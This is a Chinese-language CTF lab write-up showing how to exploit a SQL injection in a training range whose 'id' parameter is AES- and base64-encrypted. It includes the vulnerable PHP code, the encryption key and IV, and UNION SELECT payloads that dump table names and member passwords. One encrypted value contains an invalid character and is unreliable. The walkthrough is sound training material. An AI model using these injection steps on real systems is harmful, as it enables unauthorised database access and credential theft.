墨者学院CTF（SQL注入漏洞测试(参数加密)）

靶场地址：https://www.mozhe.cn/bug/detail/SjRRVFpOQWlLWDBJd3hzNGY5cFBiQT09bW96aGUmozhe

1. 靶场截图：
2. 目录扫描
访问可得new目录下list.php源码，即在此处存在注入漏洞
3. 代码审计

window.location.href="/index.php";';  //不等于重定向页面
	}else{
		return substr(trim($data),0,strlen(trim($data))-6);       //等于则回显数据
	}
}
$id=decode($_GET['id']);          //$_GET[]传递参数id
$sql="select id,title,content,time from notice where id=$id";
$info=$link->query($sql);
$arr=$info->fetch_assoc();
?>

即是先对通过?id=注入的数据解密得到明文进行判断是否后六个字符为_mozhe,只需反向加密构造payload即可

4. 构造payload
先对?id=之后的数据进行AES加密，加密模式CBC，加密位数128位，加密密码ydhaqPQnexoaDuW3，加密偏移量2018201920202021，然后又进行两次base64加密。填充为zeropadding。
构造payload：-1 union select 1,2,3,4_mozhe
AES加密：xgd58ipTrnx8VzS*JicqCo3+zFFzhay5byFU3cjbdeI=
base64加密：eGdkNThpcFRybng4VnpTQkppY3FDbzMrekZGemhheTVieUZVM2NqYmRlST0=
获取显示位：

5.爆库爆表爆列爆字段
爆库： -1 union select 1,database(),3,4_mozhe
爆表：-1 union select 1,group_concat(table_name),3,4 frominformation_schema.TABLES where TABLE_SCHEMA=‘mozhe_Discuz_StormGroup’ limit0,1_mozhe
爆列：-1 union select 1,group_concat(column_name),3,4 frominformation_schema.columns where table_name=‘StormGroup_member’ limit 0,1_mozhe
爆字段：-1 union select 1,group_concat(name,password),3,4 fromStormGroup_member limit 0,1_mozhe
6.得到key
注意MD5解密下，主要是信息泄露的代码搞懂就可以，加解密还是要了解下。

分享几个加解密网站：
AES加密网站：
http://tool.chacuo.net/cryptaes
BASE64加密网站：
https://www.sojson.com/base64.html
MD5加密网站：
https://www.cmd5.com/